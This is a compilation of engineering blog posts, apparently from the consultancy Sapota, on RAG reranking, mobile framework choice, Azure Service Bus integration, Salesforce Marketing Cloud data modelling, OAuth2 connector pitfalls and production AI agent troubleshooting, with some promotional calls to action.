We default to Pattern 1 unless the corpus is small enough that Pattern 2 is feasible and the recall lift justifies it.
ColPali extends the late-interaction idea to entire document pages treated as images. Instead of token-level embeddings of text, it uses patch-level embeddings of an image of the page (each page split into a 32x32 grid of patches). Query tokens match against image patches using the same MaxSim mechanism.
The implications:
The cost is storage (1024 vectors per page vs 1 vector per chunk) and indexing speed (vision encoder inference is GPU-bound). Binary quantization brings the storage cost down by 32x and the latency down by an order of magnitude, which is what makes ColPali production-viable.
For document-heavy corpora (research papers, financial filings, slide decks, regulatory submissions), ColPali outperforms both bi-encoder text RAG and CLIP-based multimodal RAG on published benchmarks. We use it when the corpus is genuinely visual and the budget supports the storage and GPU inference cost.
Late interaction is not free. The honest trade-off:
The number to weigh against this is the recall lift. In every audit Sapota has run where the team's recall plateaued in the 50% to 70% range, adding late-interaction reranking pushed it into the 80% to 90% range. That delta is the difference between "the AI is unreliable" and "the AI is the best search interface we have."
A reranker is not always the answer. Skip it when:
For most production RAG systems sitting at recall in the 60% to 75% range, late interaction is the next move. Cross-encoder rerankers are the lighter alternative if the team is not ready for the full ColBERT setup.
The fix took half a day. We added a Jina-reranker stage between their existing Qdrant retrieval and the LLM call. Recall jumped from 58% to 81%. Faithfulness (because the LLM was now seeing better context) went from 0.79 to 0.93. The fine-tuning project was cancelled the same week.
The next conversation is whether to upgrade the cross-encoder to a full ColBERT setup, which would push recall another 4 to 6 points based on what we have seen on similar corpora. For their current scale and budget, the cross-encoder is the right floor. Full ColBERT is the v2.
If your team has been swapping embedding models and watching the recall curve flatten, the bottleneck is almost certainly the architecture, not the model. Sapota runs a one-week reranker integration engagement that adds the cross-encoder or ColBERT stage as a working PR plus a side-by-side eval against the current setup.
Reach out via the AI engineering page with the recall numbers you are seeing and the embedding models you have already tried. The diagnosis is usually the same conversation.

---
## Mobile stack decision: FlutterFlow vs React Native vs Flutter

> Published: 2026-05-24 02:51:51+00:00
> Source: https://dev.to/sapotacorp/mobile-stack-decision-flutterflow-vs-react-native-vs-flutter-18h8
> wpnews: https://wpnews.pro/news/mobile-stack-decision-flutterflow-vs-react-native-vs-flutter

This article explains that there is no single "best" mobile framework; instead, the choice between FlutterFlow, React Native (with Expo), and Flutter depends on a project's specific constraints like timeline, team, and design needs. FlutterFlow is highlighted as the fastest path to an MVP for standard UI patterns, while React Native offers the largest ecosystem and OTA updates, and Flutter provides the most runtime control. The article warns that picking the wrong framework can cost 2 to 4 months of rework after eighteen months.

A founder asked us last month which mobile framework was "the best." We get the question often enough that we have a rehearsed answer: none of them is best. Each fits a specific set of constraints, and picking the wrong one for your specific situation usually costs 2 to 4 months of rework eighteen months in.
The framework matters less than the fit. The fit depends on your timeline, your team, your design fidelity needs, and whether you are optimizing for the next twelve weeks or the next five years. Here is the decision framework Sapota walks every founder through.
The three options on the table
For most B2C and B2B mobile products in 2026, the realistic shortlist is FlutterFlow, React Native (with Expo), or Flutter native (writing Dart directly). Native iOS / Android (Swift, Kotlin) is still the right call for some specific cases, but it is rarely the default anymore. We will cover when native does win at the end.
The three frameworks differ on three dimensions that matter most: development speed, runtime control, and team future-proofing.
FlutterFlow
A visual development tool built on top of Flutter. You design screens by dragging components, configure data sources visually, and FlutterFlow generates Dart code under the hood. Custom logic drops into Dart custom actions and custom widgets when the visual editor cannot express what you need.
Strengths:
- Fastest path to a shippable MVP. 12-week marketplace MVPs are realistic for a 3-engineer team.
- Pixel-perfect design implementation. Figma to FlutterFlow is closer to one-to-one than any other framework we have used.
- Theming and white-label setup are first-class concepts. Multi-tenant apps with brand variables ship in days, not weeks.
- The founder can open the editor and request changes that you implement in minutes. Tightest design-to-development feedback loop in the industry.
Where it pushes back:
- Anything custom-rendered (canvas drawing, complex animations, game-like UI) needs Dart custom widgets, which pulls you out of the visual flow.
- State management at scale (3+ user roles, multi-tenant theming, real-time updates) outgrows app-state primitives. You end up moving state to the backend and treating the app as a thin client.
- Performance profiling is shallow. No equivalent to React Native's Flipper or Flutter's DevTools. You debug performance through guesswork.
- Vendor lock-in is real. Migrating off FlutterFlow means rebuilding in Flutter or another framework, not exporting and continuing.
Pick FlutterFlow when:
- MVP timeline is under 16 weeks
- 80%+ of screens are standard mobile UI patterns (auth, lists, details, forms)
- Backend is decoupled (Supabase, Firebase, custom API)
- Your team accepts that custom Dart will be needed for the bespoke 20%
- Visual fidelity matters and you want predictable results across iOS and Android
Skip FlutterFlow when:
- The product needs heavy real-time interactivity (multiplayer games, collaborative drawing, live markets)
- Your engineering team will need to maintain the app for 5+ years and you want them comfortable with the underlying framework directly
- You already have a strong React Native or Flutter team; the framework switch cost is higher than the visual development savings
React Native (with Expo)
Facebook's framework for building native mobile apps using JavaScript and React. With Expo's tooling (EAS Build, EAS Update, OTA patches), you get a managed workflow that handles a lot of native build complexity automatically.
Strengths:
- Largest ecosystem of any cross-platform framework. Almost any native API has a JavaScript wrapper. Stuck on something? There is a npm package or a community fix.
- JavaScript / TypeScript familiarity. Your web team can ramp on mobile faster than learning Dart or Swift.
- OTA updates via Expo. Push bug fixes without going through App Store review. For early-stage products iterating weekly, this is significant.
- Mature debugging tools (Flipper, React DevTools, native debuggers).
- Best long-term hire-ability. JavaScript engineers are everywhere.
Where it pushes back:
- Performance ceiling lower than Flutter or native for graphics-heavy or animation-heavy apps. The JavaScript bridge is faster than it used to be (with Hermes and the new architecture) but still not native.
- Native module compatibility issues when you upgrade React Native. Major upgrades are rarely smooth. We budget 2-4 weeks for upgrades on production apps.
- Visual fidelity work is more iterative than FlutterFlow. Designs render close but you spend more time on platform-specific edge cases (Android shadows, iOS safe areas, font rendering).
- Easy to ship a slow app accidentally. The framework forgives sloppy patterns until production load reveals them.
Pick React Native when:
- Your team has strong JavaScript / TypeScript background
- The product needs OTA update capability (frequent iteration without store review)
- You want hire-ability and ecosystem maturity over raw performance
- The app is content-heavy or transactional (most B2B SaaS, content apps, e-commerce)
- You expect 3+ years of active development with team turnover
Skip React Native when:
- The app is graphics or animation-heavy
- You need consistent 60+ fps under load
- Your team has no JavaScript expertise and you would be teaching from scratch
- The product is highly platform-specific (deep iOS-only or Android-only integrations)
Flutter native
Writing Dart directly against Flutter's framework, no visual builder. Same underlying technology as FlutterFlow but with full control over every line of code.
Strengths:
- Best performance of the three options. Compiles to native code, no JavaScript bridge, predictable 60+ fps even with complex UI.
- Single codebase compiles to iOS, Android, web, desktop. The most truly cross-platform option of the three.
- Beautiful animation framework. If your app's differentiator is motion design or visual polish, Flutter native gives you the most expressive primitives.
- Strong typing with Dart catches more bugs at compile time than JavaScript.
- DevTools profiler is excellent. Performance debugging is straightforward.
Where it pushes back:
- Slower to ship MVP than FlutterFlow. You write every screen by hand. For an MVP that FlutterFlow ships in 12 weeks, Flutter native usually takes 16-20.
- Smaller ecosystem than React Native. Most native APIs have Flutter packages, but the long tail is smaller. You will write more native plugins yourself.
- Hire-ability is improving but still behind JavaScript. Senior Flutter engineers in 2026 are easier to find than in 2022 but still command a premium.
- Dart is a mid-popularity language. Comfortable for most engineers within a few weeks but not a transferable skill outside Flutter.
Pick Flutter native when:
- Performance requirements are strict (60+ fps under all load conditions)
- The app's design includes complex animations or motion as a differentiator
- You want one codebase across iOS, Android, web, and possibly desktop
- The team is already Flutter-fluent or willing to invest in becoming so
- Long-term ownership of the codebase matters more than fastest-possible MVP
Skip Flutter native when:
- Your timeline is under 16 weeks for v1
- You have no Flutter or Dart experience and the team's bandwidth to ramp up is limited
- The product is mostly standard CRUD screens (FlutterFlow ships these faster)
- You need OTA updates as a core capability (Flutter has this but ecosystem is less mature than Expo)
When native (Swift, Kotlin) still wins
We bring up native iOS / Android less often than we used to, but it has not disappeared. The cases where we still recommend native:
- Heavy platform-specific integrations: Apple Pay deep integration, ARKit / RealityKit, Watch app, CarPlay, App Clips, Live Activities. Same on Android: deep Auto, Wear OS, advanced camera features. Cross-platform frameworks reach these eventually but always with delay.
- Performance-critical apps with platform-specific optimization: heavy image processing, on-device ML, AR / VR. Native gives you direct access to Metal, Core ML, ARKit without bridge overhead.
- Apps where the team is already native and the cross-platform switch costs more than maintaining two codebases: rare but real. A team that has shipped 5 years of Swift will lose more by switching than by writing two apps.
- Projects where the App Store review process is hostile to cross-platform (some categories of apps face stricter review when they look or behave non-native).
For most B2C and B2B SaaS products in 2026, native is overkill. The cross-platform frameworks have closed the gap on 95% of use cases.
The decision matrix
Eight criteria, four options each.
MVP speed (how fast you can ship v1):
- FlutterFlow: Fastest
- React Native: Fast
- Flutter native: Medium
- Native (Swift/Kotlin): Slowest
Performance ceiling (frame rate under load):
- FlutterFlow: Medium
- React Native: Medium
- Flutter native: High
- Native: Highest
Hire-ability in 2026 (how easy to find engineers):
- FlutterFlow: Niche
- React Native: High
- Flutter native: Medium
- Native: High per platform (Swift or Kotlin separately)
OTA updates (ship fixes without store review):
- FlutterFlow: Yes via FlutterFlow Cloud
- React Native: Yes via Expo
- Flutter native: Limited
- Native: Not supported
Long-term codebase health (5+ year ownership):
- FlutterFlow: Risky, vendor lock-in
- React Native: Stable
- Flutter native: Stable
- Native: Stable
White-label / multi-tenant theming:
- FlutterFlow: Native first-class concept
- React Native: Doable with effort
- Flutter native: Doable with effort
- Native: Doable with effort
Custom animations (motion-heavy products):
- FlutterFlow: Limited
- React Native: Medium
- Flutter native: Strongest
- Native: Strongest per platform
Visual fidelity to Figma:
- FlutterFlow: Highest
- React Native: Medium-High
- Flutter native: High
- Native: Highest per platform
How Sapota approaches the choice
The mistake we see most often is teams picking a framework based on what their current developers happen to know, then spending the next two years working around its limitations. The framework should fit the product, not the team's existing comfort zone.
Our mobile engineers are trained across all four stacks (FlutterFlow, React Native, Flutter native, and the native platforms). When a new project lands, we run a fit assessment that scores the project against each framework on the criteria above. The recommendation comes from the assessment, not from "what we happen to specialize in."
This sometimes means we recommend FlutterFlow when the founder expected React Native, or React Native when they expected Flutter. The conversation is occasionally awkward (founders have read articles, formed preferences) but it saves the months of rework that come from picking the wrong framework. We have done that rework on inherited projects often enough to know what it costs.
The cross-training is deliberate. A vendor who only knows FlutterFlow will recommend FlutterFlow. A vendor who only knows React Native will recommend React Native. The unbiased recommendation is the differentiator, and the only way to give it honestly is to be fluent across the options.
A simple decision tree
If you do not want to walk through the full matrix, the rough heuristic:
- MVP in under 16 weeks, standard CRUD screens, single brand or simple white-label → FlutterFlow
- 3+ year codebase, JavaScript team, frequent iteration with OTA → React Native
- Performance-critical, animation-heavy, or codebase needs to span iOS / Android / web → Flutter native
- Heavy platform-specific integration or your team is already native and shipping → Native
When in doubt, FlutterFlow for MVP, React Native for the production rebuild if you outgrow FlutterFlow's limits.
If you are picking a stack right now
If your team is debating mobile frameworks and the conversation is not converging, the issue is usually that nobody has put the project's specific constraints on the table next to eac

---
## Plugin + Azure Function + Service Bus: async integration at scale

> Published: 2026-05-24 02:51:45+00:00
> Source: https://dev.to/sapotacorp/plugin-azure-function-service-bus-async-integration-at-scale-4o2i
> wpnews: https://wpnews.pro/news/plugin-azure-function-service-bus-async-integration-at-scale

This article describes an enterprise integration pattern where a Dataverse plugin publishes a small metadata message to an Azure Service Bus Topic, rather than directly calling multiple downstream systems. Five independent Azure Function consumers then subscribe to the topic, each handling its own destination (ERP, search, Power BI, notifications, data lake) with independent retry, dead-lettering, and idempotency logic. This architecture ensures that a failure in one downstream system does not affect the others, improving reliability at scale.

A Dataverse row changes. Five downstream systems need to know: an ERP that tracks financials, a search service that indexes the record, a Power BI dataset that feeds executive dashboards, a notification queue that messages field reps on mobile, and a data lake for analytics retention.
The junior version of this is a single async plugin that calls all five from the same post-operation step. It works in development. In production, it fails the first time any one of the five has a bad afternoon - the plugin step errors, retries ten times, fills the System Jobs queue, and operators get paged.
The pattern we ship at enterprise scale is different: the plugin's only job is to publish a message to Azure Service Bus. Five independent consumers pull from that message topic and handle their respective destinations. Each consumer retries, dead-letters, and monitors independently. The plugin never calls out to anything but the queue.
Here is the architecture, the code, the failure semantics, and the six months of real-production experience that shaped it.
The architecture
A Topic (not a Queue) because the same event feeds multiple subscribers. Subscriptions filter so each consumer only sees events it cares about. Dead-letter per subscription, not global - the ERP and search services can fail independently without cross-contaminating.
Stage 1: the plugin
The plugin is small on purpose. Every line is a potential failure point; the less it does, the more reliable it is.
Three key decisions:
- Payload is metadata, not the full row. The message includes the entity name, ID, and which attributes changed. Consumers fetch the full row if they need it. Messages stay small (sub-1KB), which Service Bus charges less for and which avoids the edge case of payloads exceeding message size limits.
- CorrelationId from the plugin context. Every log entry and every downstream message carries the same correlation ID, making cross-system tracing possible with one query.
- Subject field for filtering. Subscribers filter on Subject LIKE 'account.%' or Subject = 'order.Update'. Subject-based filtering is cheap server-side; body-based filtering is more expensive.
Stage 2: Service Bus Topic configuration
Topic-level settings:
- Max message size: 1MB (default). Our payloads are ~500 bytes, nowhere near the limit.
- Message time-to-live: 7 days. Long enough to survive a weekend outage, short enough that stale messages don't haunt the system.
- Duplicate detection: enabled with 10-minute window. If the same MessageId arrives twice within 10 minutes, the second is dropped. This guards against plugin retries causing duplicate downstream processing.
Subscription-level settings per subscriber:
- Filter rule: SQL-like expression on message properties (Subject, custom headers).
- Max delivery count: 5 (same reasoning as in the simpler Service Bus pattern).
- Lock duration: tuned to each consumer's processing time. The ERP consumer, which makes a remote call taking up to 30 seconds, has a 60-second lock. The search consumer, which is purely in-Azure and takes 1-2 seconds, has a 30-second lock.
Stage 3: the consumers
Each subscriber is an Azure Function with a Service Bus Topic subscription trigger. They share a common frame but implement different downstream logic.
Common frame:
The idempotency store is either Cosmos DB with TTL or Redis. Every successfully processed MessageId is recorded. The TTL matches the message time-to-live on the Topic plus a safety margin.
Core logic per consumer is where the differences live:
- ERP consumer: fetches the full Dataverse row via Web API (using a managed identity), maps to the ERP's schema, calls the ERP API with an idempotency key derived from MessageId.
- Search consumer: fetches the row, calls the search service's indexing API.
- Power BI consumer: triggers a dataset partition refresh; uses the correlation ID to tag the refresh operation.
- Notification consumer: looks up which users to notify based on the row's owner and policy, sends via the notification service.
- Data lake consumer: appends a compressed JSON record to partitioned ADLS Gen2 path by date.
Observability
The chain is not useful in production without observability. Our setup:
- Application Insights per Function App, with shared workspace so queries span functions.
- Every log entry includes CorrelationId and MessageId via the BeginScope pattern above.
- Custom metrics: ProcessedMessages, FailedMessages, DeadLetteredMessages, ProcessingDuration.
- Dashboards (Azure Monitor workbooks):End-to-end latency per event type (from Dataverse change timestamp to final destination write).Dead-letter queue depth per consumer.Error rate per consumer, per hour.
- Alerts: DLQ depth > 10 for any consumer, processing duration p95 > SLA for any consumer.
The end-to-end trace for a single event: a KQL query across Application Insights joining by CorrelationId. One row change in Dataverse, traced through plugin → Service Bus publish → each consumer → each downstream call. When something fails, we know exactly where in the chain.
Six months in production: the numbers
A client with:
- 50,000 Dataverse events per day
- 5 consumers averaging 3 seconds processing each
- Bursts to 500 events/minute during peak hours
Current state:
- P50 end-to-end latency (event → all consumers complete): 4.2 seconds
- P95 end-to-end latency: 11 seconds
- Dead-letter rate: 0.003% (one in 33,000 messages)
- Consumer error rate: 0.1-0.2% (mostly transient, auto-retried)
- Monthly Azure cost (Service Bus + Function Apps + Application Insights): ~$320
What we tuned after launch
Ratio of Function App instances to queue depth. Consumption plan auto-scales; the defaults were conservative. We adjusted maxConcurrentCalls per function to keep consumer processing near its per-instance capacity before spinning up more instances.
Filter rules on subscriptions. Initially each consumer received every event and filtered in code. Moving the filter to the subscription level (server-side) cut consumer costs by ~60% because consumers no longer woke up for irrelevant events.
Deduplication window. Initial 1-minute window was too short; plugin retries occasionally pushed duplicates more than a minute apart. Extended to 10 minutes after measuring actual retry intervals.
When not to ship this
This pattern is overkill for:
- Projects with one or two downstream consumers - direct Power Automate flow is simpler.
- Low-volume scenarios (< 1000 events/day) - the operational complexity outweighs the throughput benefit.
- Teams without Azure experience - maintaining Service Bus, Function Apps, and Application Insights is real ops burden. Pick a simpler pattern until the operational muscle exists.
For the projects where it fits (enterprise-scale, multi-consumer, event-critical), this is the architecture we reach for first. It survives load, it surfaces failures cleanly, and when something goes wrong, the fix is almost always in a known location with clear visibility.

---
## SFMC Data Model and Cardinality: Wire DEs Together Without Regret

> Published: 2026-05-24 02:51:40+00:00
> Source: https://dev.to/sapotacorp/sfmc-data-model-and-cardinality-wire-des-together-without-regret-21l
> wpnews: https://wpnews.pro/news/sfmc-data-model-and-cardinality-wire-des-together-without-regret

The article explains that a common mistake in Salesforce Marketing Cloud (SFMC) is creating Data Extensions (DEs) reactively, leading to an unjoinable data sprawl. It recommends a proactive approach: first define a Database of Record (DBOR) and a stable Subscriber Key, then structure DEs using a Master/Spoke model with correct cardinality (1:1, 1:Many, Many:Many) to enable effective cross-data segmentation. Proper data modeling, documented and signed off before building, is presented as the most critical step to avoid costly remediation later.

Teams new to SFMC create Data Extensions as requirements arrive. Today's send needs a list, tomorrow's loyalty feature needs a separate DE, next week's CRM sync adds three more. Three months in: 20 DEs, nothing can be joined, no cross-data segmentation works, no audit trail.
The fix is 30 minutes on a whiteboard before the first DE exists. Two concepts carry it: Database of Record and Cardinality.
The DBOR is the single source of truth for subscriber identity. Every other data source points at it.
Discovery question for the client:
One answer. If the client says "all of them," help them decide - usually by picking the system that currently drives business operations (order fulfillment, customer service queries).
The DBOR defines the Subscriber Key. All SFMC DEs that hold subscriber data use an ID that maps back to the DBOR.
Once DBOR is decided, the Subscriber Key follows:
The Subscriber Key must be stable - never changes over a customer's lifetime. Email addresses change; Shopify IDs can reset on a store migration; a purpose-built CustomerID is safest.
Document the Subscriber Key rule in the data model doc. When new data sources arrive later, they get plumbed through the same Subscriber Key.
Rather than one giant DE with every column, split by function:
Master holds the subscriber-facing attributes. Spokes hold the detail. Joins happen via AMPscript Lookup or Automation Studio SQL, not by duplicating columns.
When you link DEs in Contact Builder for cross-DE segmentation, SFMC asks about cardinality - the relationship between two DEs:
CardinalityMeaningExample1:1One row in A relates to one row in BCustomer -> primary Address (each customer has one primary)1:ManyOne row in A relates to many rows in BCustomer -> Orders (one customer, many orders)Many:ManyMany rows in A relate to many in BCustomer -> Product (via Order_Items - each customer can buy many products, each product bought by many)
Getting cardinality wrong breaks segmentation:
Before touching SFMC for a new engagement, we write a one-page data model:
Review with the client. Once signed off, building in SFMC follows the doc rather than the other way around.
When picking up a poorly-modeled SFMC account, the symptoms are predictable:
The remediation is the same whether you're starting fresh or remodeling: define DBOR, fix Subscriber Key, introduce a Master DE, migrate downstream.
Data modeling doesn't feel productive because you're not building anything yet. On SFMC engagements it's the most leveraged hour of the whole project. Write the data model doc, get client sign-off, then build. The alternative is the 20-DE sprawl that eats your Q2.
Modeling an SFMC data architecture? Our Salesforce team designs data models, Subscriber Key strategies, and Contact Builder relationships on production engagements. Get in touch ->
See our full platform services for the stack we cover.

---
## Custom connector with OAuth2: three auth pitfalls we debugged

> Published: 2026-05-24 02:51:34+00:00
> Source: https://dev.to/sapotacorp/custom-connector-with-oauth2-three-auth-pitfalls-we-debugged-4758
> wpnews: https://wpnews.pro/news/custom-connector-with-oauth2-three-auth-pitfalls-we-debugged

Here is a factual summary of the article:

The article describes three common pitfalls encountered when building a custom Power Automate connector using OAuth2 for a third-party API. The issues included a redirect URI mismatch between Power Platform environments, a failure to refresh tokens because the `refreshUrl` was not explicitly configured in the connector's OpenAPI schema, and the inability to send non-standard parameters (like a tenant ID) during the token exchange. The authors provide specific fixes, such as registering multiple redirect URLs and explicitly setting the refresh URL, while noting that some provider-specific behaviors require workarounds like using an Azure Function.

A client uses a third-party logistics API that is not in Power Automate's built-in connector catalog. The API speaks OAuth2 authorization code flow. The platform has a "Create a custom connector" flow that claims to handle OAuth2 in a couple of clicks. The first two connectors we built this way worked. The third hit three separate issues that took a combined week to diagnose.
Here is what those three were, and the patterns we now check up-front on every OAuth2 custom connector.
You fill in a form with:
The platform handles the rest: redirect the user through consent, capture the authorization code, exchange it for an access token, refresh when expired. When a flow uses the connector, the current access token is injected into the Authorization header automatically.
This works when the identity provider follows the OAuth2 spec faithfully. It breaks in ways the platform does not surface clearly when the provider takes any of the common non-spec shortcuts.
You configured the logistics API's OAuth app with a redirect URL copied from your Dev environment. The Dev custom connector works. You export the solution to UAT, import it, and the first OAuth consent in UAT fails with "redirect_uri_mismatch."
Root cause: Power Platform generates a redirect URL that includes the environment-specific tenant subdomain. The URL from Dev is not the URL from UAT.
Fix: register multiple redirect URLs in the identity provider, one per Power Platform environment. The OAuth app on the IdP side needs an entry for every https://global.consent.azure-apim.net/redirect/* URL that corresponds to your environments.
Complication: some identity providers allow wildcards in redirect URL registration (https://global.consent.azure-apim.net/redirect/*), others do not. For the strict ones, you maintain a list and add/remove entries when environments come and go.
The API you are connecting to issues access tokens valid for 1 hour and refresh tokens valid for 30 days. Power Platform should refresh the access token automatically when it expires; you should not need to re-authorize for 30 days.
What happened: every 2 hours, the flow started failing with 401 Unauthorized. Manual reauthorization of the connection fixed it; 2 hours later, same failure.
Diagnosis took a while. The flow's run history showed the token being used, the API rejecting it, but no refresh attempt. We eventually traced it to how the connector was declaring its refresh behavior in the OpenAPI schema: the connector had no refreshUrl configured, so the platform treated every token as final and never attempted a refresh.
Fix: set the refreshUrl explicitly in the connector's security section, even if it is the same as the token URL. Without it, the platform assumes no refresh is supported.
A secondary issue we found: some APIs rotate the refresh token on every refresh (return a new refresh token alongside the new access token). Power Platform handles this correctly if the response includes refresh_token in the JSON. APIs that only include refresh_token on the initial grant and not on refresh will eventually expire the stored refresh token, and re-authorization becomes necessary. This is a provider behavior you cannot fix in the connector - you can only schedule manual re-auth before the refresh token's lifetime runs out.
Standard OAuth2 token exchange sends grant_type=authorization_code, code=, redirect_uri=, etc. in the form body.
The API we were connecting to wanted an additional tenant_id parameter on every token exchange. It is not part of the spec; the provider added it for their multi-tenant SaaS model. Power Platform's custom connector OAuth2 configuration does not have a field for "extra parameters to send on token exchange." Default behavior sends only the spec-defined fields. The fix we used was hacky: move the OAuth flow behind an Azure Function. The flow calls the function's HTTPS endpoint, the function does the token exchange with the full set of parameters and returns the access token, the flow uses the access token via a separate connector that expects Bearer auth. This doubled the integration complexity (an extra hop, an extra resource to monitor) but was the only working path. We later migrated to direct connector when the API provider added spec-compliant OAuth as an option. The broader lesson: before building a custom connector with OAuth2, confirm the target API follows OAuth2 strictly enough to work in the platform's constrained configuration. Providers that require custom token exchange parameters, non-standard response fields, or DPoP/mTLS cannot use the built-in OAuth2 flow - and the connector wizard does not warn you. ## The pre-check we run before building an OAuth2 connector Ten minutes of reading provider docs before clicking "New custom connector" saves hours later. Our checklist: 1. Does the provider document the authorize URL, token URL, and refresh URL? (All three needed; "refresh works same as token" is the common case but confirm.) 2. Does the provider accept wildcard or multiple redirect URLs, or only one? (If only one, you need an extra OAuth app per environment.) 3. Does the provider rotate refresh tokens on refresh, and what are the lifetimes? (Shorter refresh lifetime means more re-auth pain.) 4. Does the token exchange require any parameters beyond the OAuth2 standard set? (If yes, you likely need an Azure Function proxy.) 5. Does the API require PKCE? (Power Platform supports it for some flows; confirm.) Any "no, not sure" on these is a reason to de-risk before committing the full integration. ## The connection reference hygiene A custom connector deployed to managed solution uses connection references for per-environment auth. One connector, one connection reference, N connections (one per environment, each bound to its own OAuth authorization). For the auth to actually carry across environments: - Create a long-lived connection per env at initial setup (authorize once, test works) - Ship the connection ID in the deployment-settings.json for each env - Rotate/reauthorize only when the refresh token lifetime runs out A connection reference that is re-bound mid-release will break every running flow. We now treat OAuth-backed connection references as nearly immutable - rebinding is an ops event, planned, communicated. ## The fourth pitfall we almost had On a subsequent project, we almost repeated a mistake: committing an OAuth client secret into the deployment-settings file. The file is in git. The secret would have been in git history forever. Pattern we now enforce: OAuth client secrets live in Azure Key Vault. A secret-type environment variable references the Key Vault secret URI. The deployment-settings file references only the env variable schema name, not the secret value. Git gets the schema name; Key Vault gets the secret; nothing sensitive lives in both. Four pitfalls, one prevention pattern each. Built into the project template, the custom-connector work that used to eat weeks now takes days.

---
## Four forensics when a production AI agent fails

> Published: 2026-05-24 02:51:28+00:00
> Source: https://dev.to/sapotacorp/four-forensics-when-a-production-ai-agent-fails-4in2
> wpnews: https://wpnews.pro/news/four-forensics-when-a-production-ai-agent-fails

The article describes a common failure pattern in production AI agents, where multiple distinct issues—such as degraded external dependencies, faulty validation gates, and cost spikes from specific user queries—compound to appear as a single "broken agent" problem. It outlines a forensic approach using traces to diagnose these failures, citing a real case where an LLM provider's quiet model update increased agent iterations and latency, while permissive validation thresholds and a few high-cost users further degraded performance. The recommended fixes include tightening prompts, adjusting validation thresholds, and implementing per-user cost caps.

A founder messaged us at 11pm on a Friday: "Our agent is broken. Customers are complaining. My on-call engineer has no idea where to start. Can you help?"
The agent was a customer support tool that had launched the previous Monday. By Friday evening, the company's support inbox had filled with users reporting that the AI was giving wrong answers, taking forever to respond, or just timing out. The engineering team was treating it as one big problem. It was actually four problems stacked on top of each other.
This is the failure pattern most production agent teams hit at some point. The symptoms compound, the team panics, and they start trying random fixes. Here is the forensics order Sapota walks through, and the four most common failure modes that account for the majority of post-launch incidents.
Before debugging anything else, look at the traces. If your agent is in production without traces, that is the first problem to solve, even mid-incident. Pull a request that is failing, look at the trace, and see where the time is being spent and what is failing.
The pattern we look for in the trace:
In the founder's case, the traces showed three different failure patterns appearing in the same week. The team had been treating them as one problem because the customer-facing symptom was the same: "the AI is broken."
The most common production agent failure is an external dependency getting slower or less reliable. The agent itself is fine; the world around it changed.
Common culprits:
The diagnostic: check your tool latency and error metrics for the past week. If any tool's p95 latency is 2x what it was at launch, or its error rate is up more than 1%, that is the candidate.
The fix depends on the specific dependency. Rate limits: upgrade your tier or implement exponential backoff. Slow retrieval: tune the index or scale the database. API drift: update the integration. KB growth: re-tune chunking and retrieval parameters.
In the founder's case, the LLM provider had pushed a quiet model update on Wednesday. The new model interpreted the routing prompt slightly differently, causing the agent to loop more often before settling on an answer. Average iterations went from 2.3 to 4.1. Cost and latency both jumped. The fix was a tighter routing prompt with three more few-shot examples.
The opposite failure: a validation gate is supposed to be catching bad outputs, but it is not firing because the gate logic has a bug or the threshold is wrong.
Common patterns:
The diagnostic: look at a sample of bad responses customers reported. Trace what should have caught them. If a validation gate exists for that failure mode, check whether it actually fired.
In the founder's system, the faithfulness threshold was set at 0.7, which was permissive. We tightened it to 0.85, the rejection rate went from 2% to 9%, and the customer complaints about wrong answers dropped immediately. The "rejected" responses were replaced with honest "I cannot find that in our knowledge base" messages, which users preferred to wrong answers.
Production query distribution is different from test distribution. Specific query patterns can be much more expensive than the average, and a few of those can dominate the bill.
The pattern: a small fraction of users (often 1-5%) generate a large fraction of cost (often 30-60%). Either through legitimate complex queries, abuse, or because their input triggers a degenerate code path in the agent.
The diagnostic: pull cost-per-user statistics for the last week. Sort descending. Look at the top 10 users. Are they sending normal queries? Or is one user looping their integration with bad inputs? Or is a specific query class (long documents, malformed input, multi-turn deep into rare topics) eating budget?
The fixes vary:
In the founder's system, two users were sending repeated multi-paragraph product comparison requests, generating about 40% of the daily cost between them. We added a per-user daily cost cap and a length limit on inputs. Cost dropped 35% within 48 hours. Neither user complained because both were testing internal features and the cap was generous enough for normal use.
The hardest failure to detect: nothing is broken, no errors, latency is fine, cost is normal. But the responses are getting worse. Customers complain, the team cannot reproduce, and the dashboards all look green.
Causes:
The diagnostic: run your eval pipeline against the current production agent. Compare against the score from launch. If the score has dropped, you have quality drift. If the score is the same but customers are complaining, your eval set has gone stale.
The fix: refresh the eval set. Sample 50-100 actual production queries, write expected answers for each, run the eval, and tune from there. Most teams refresh eval sets quarterly. Teams in fast-moving domains do it monthly.
The four-hour Friday-night triage:
Customer complaints stopped within 72 hours. The team's mood went from "we built a broken thing" to "we built a thing that needs operational rigor we did not anticipate." That second framing is the one that produces a better product.
The founder's team had no playbook for "the agent is broken in production." They were debugging in panic mode, which slowed every step. After the incident, we wrote a one-page runbook with the four failure modes, the diagnostic for each, and the most common fixes.
Six weeks later, when a similar issue happened (a tool API outage), the on-call engineer worked through the runbook, identified the cause in 20 minutes, applied the documented fix, and was done in an hour. No panic, no escalation, no Friday-night call to a consultant.
This is what production agent operations looks like at maturity. Not "nothing ever goes wrong" but "when things go wrong, the team has a known process to find the cause."
If your team launched an AI agent and the first few weeks have been more painful than expected, the right intervention is usually a forensic audit, not more development. Most launch issues are not new bugs in the agent code. They are operational gaps that surface only at production scale.
Sapota offers a one-week post-launch audit that walks through traces, validation, dependencies, and quality drift, identifies which of the four failure modes is responsible for which symptoms, and ships fixes plus a runbook for future incidents. We have done this for half a dozen B2B SaaS clients in the first three months after their AI launches.
Reach out via the AI engineering page with a description of what your agent does and what kind of failures you are seeing. The first conversation is usually the diagnostic.